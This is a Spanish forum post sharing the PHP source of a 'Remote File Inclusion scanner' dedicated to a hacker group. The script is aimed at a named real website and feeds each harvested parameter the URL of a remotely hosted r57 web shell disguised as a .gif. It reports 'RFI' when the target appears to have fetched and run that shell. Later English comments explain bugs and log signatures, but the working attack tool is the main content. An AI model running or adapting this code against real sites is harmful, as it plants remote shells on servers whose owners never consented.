Lo programé hace bastante tiempo; me había olvidado de él hasta ayer, que lo encontré y decidí publicar el código :P

Mas informacion: http://www.elefren.com/blog/RFI-Scanner-en-PHP/

Saludos, elefrEn
Código:
<?
/*
RFI Scanner 1.0
Author: elefrEn
Website: http://elefren.com/
email: [email protected]

Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
Gr33tz: -> JosS | nhh-32 | Omega <-
*/

# Lift PHP's execution time limit; the script performs one blocking HTTP fetch
# for the front page plus one per parameter name.
set_time_limit(0);

#Config
$urlweb = "www.guia-ubuntu.org";# Host to scan, written without the http:// scheme (e.g. google.com)
$urlshell = "http://usuarios.lycos.es/w0rms/r57.gif";# Absolute URL of the remotely hosted script that each probe passes as the parameter value
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# '|'-separated parameter names tried in addition to the ones harvested from the page
$filetoscan = "index.php";# Script on the target whose parameters are probed

#Funcs
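/**
 * Lists the parameter names that appear in a URL's query string.
 *
 * Each name is emitted with a leading "|" (e.g. "|id|page"); values are
 * discarded. A URL with no query string yields a single "|", i.e. one empty
 * name, which is what the original implementation produced as well.
 *
 * @param string $url Absolute or relative URL, possibly copied from HTML
 *                    (so pairs may be separated by "&amp;" instead of "&").
 * @return string Names, each prefixed with "|".
 */
function vars($url){
	$parts = parse_url((string) $url);
	// parse_url() returns false for a malformed URL and leaves 'query' unset
	// when the URL has none; both cases are treated as an empty query.
	$query = (is_array($parts) && isset($parts['query'])) ? $parts['query'] : '';
	// hrefs taken from page source separate pairs with "&amp;"; normalise that
	// before splitting instead of stripping "amp;" anywhere in the result.
	$query = str_replace('&amp;', '&', $query);
	$names = '';
	foreach (explode('&', $query) as $pair) {
		// Limit 2: only the text before the first "=" is the name.
		$kv = explode('=', $pair, 2);
		$names .= '|'.$kv[0];
	}
	return $names;
}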
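/**
 * Removes empty and repeated entries from a "|"-separated list.
 *
 * Entries are compared case-insensitively as whole strings and the first
 * spelling wins. The original implementation interpolated each entry into a
 * regular expression and matched it against the output so far: entries are
 * harvested from remote page content, so regex metacharacters in them were
 * interpreted as pattern syntax, and any entry that was merely a substring of
 * an earlier one (e.g. "id" after "uid") was silently dropped.
 *
 * @param string $list   Entries separated by "|".
 * @param bool   $barras When true, entries are joined with "|"; otherwise with "<br>".
 * @return string Every kept entry followed by the separator; "" when nothing is kept.
 */
function beerres($list, $barras = FALSE){
	$sep = $barras ? '|' : '<br>';
	$seen = array();
	$out = '';
	foreach (explode('|', (string) $list) as $entry) {
		if ($entry === '') {
			continue;
		}
		// Keyed lookup gives exact, case-insensitive de-duplication without
		// treating untrusted text as a pattern.
		$key = strtolower($entry);
		if (isset($seen[$key])) {
			continue;
		}
		$seen[$key] = true;
		$out .= $entry.$sep;
	}
	return $out;
}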
/**
 * Fetches http://<$n00b>, collects the href of every anchor whose target
 * starts with $file, and returns the distinct query-parameter names found in
 * those links.
 *
 * @param string      $n00b Host (optionally with a path) without the scheme.
 * @param string|bool $file Prefix the href must start with. The FALSE default
 *                          interpolates as an empty string, so every
 *                          double-quoted href matches.
 * @return string Parameter names, each followed by "|" (beerres() with $barras set).
 */
function extrac($n00b, $file = FALSE){
	// Note the distinct names: $n00b is the parameter, $n0ob the full URL.
	$n0ob = 'http://'.$n00b;
	// file() over HTTP depends on allow_url_fopen. The "&" is call-time
	// pass-by-reference, which PHP 5.4 removed, so this file only parses on
	// older interpreters. The response body is untrusted remote content.
	$source = join("",file(&$n0ob));
	// $file is placed into the pattern unescaped. $vars receives the match
	// count and is not used again.
	$vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
	$t0t = count($results[1]);
	$var = 0;
	while($var < $t0t){
		// The first (.*) is greedy and can run past the closing quote, so keep
		// only the text up to the first double quote.
		$xtr = explode('"',$results[1][$var]);
		// $urllist is accumulated but never read or returned.
		$urllist .= $xtr[0].'|';
		$varlist .= vars($xtr[0]);
		$var++;
	}
	// $m0s and $varlist are never initialised; with no matching links this
	// passes an empty value to beerres().
	$m0s .= $varlist;
	return beerres($m0s,1);
}
/**
 * Requests $web.$file once per parameter name, passing $urlshell as the
 * value, and builds an HTML report line for each request.
 *
 * What this looks like from the target's side: a run of GET requests to the
 * same script in which a single parameter carries an absolute http:// URL
 * ending in "?". That shape is what access-log review and WAF/IDS rules key
 * on. A target is only affected if it passes the parameter to
 * include/require with allow_url_include enabled (it is off by default).
 *
 * @param string $vars     Parameter names separated by "|".
 * @param string $web      Base URL of the target, including the trailing "/".
 * @param string $file     Script name appended to $web.
 * @param string $urlshell Absolute URL used as the parameter value.
 * @return string HTML fragment, one "<br>"-terminated line per request.
 */
function rfi($vars,$web,$file,$urlshell){
	// Empty entries (e.g. from "||") are not filtered here and produce a
	// request with an empty parameter name.
	$list = explode('|',$vars);
	$var = 0;
	while($var < count($list)){
		// The trailing "?" makes any suffix the target appends to the value
		// part of the remote URL's query string.
		$url = $web.$file."?".$list[$var]."=".$urlshell."?";
		// Call-time pass-by-reference ("&$url") was removed in PHP 5.4, so
		// this line is a fatal error on any later interpreter.
		$source = join("",file(&$url));
		// The verdict is only a case-insensitive search for the word "shell"
		// in the response. A page that contains that word for any other reason
		// is reported as "RFI", and "Secure" says nothing more than that the
		// word was absent. A true positive means the target has already
		// fetched and executed the remote file.
		if(preg_match("/shell/i",$source)){
			$m0s .= "<font color=red><b>RFI-></b></font> ";
		}else{
			$m0s .= "<font color=green><b>Secure-></b></font> ";
		}
		// $url contains names harvested from the remote page and is written
		// into the HTML report unescaped.
		$m0s .= $url.'<br>';
		$var++;
	}
	return $m0s;
}

#Exec
# Harvest parameter names from the target's front page, append the built-in
# $comunvars list, probe each name against $filetoscan and print the HTML report.
# extrac() is called without its second argument, so links to any file on the
# page contribute names, not only links to $filetoscan.
echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
?>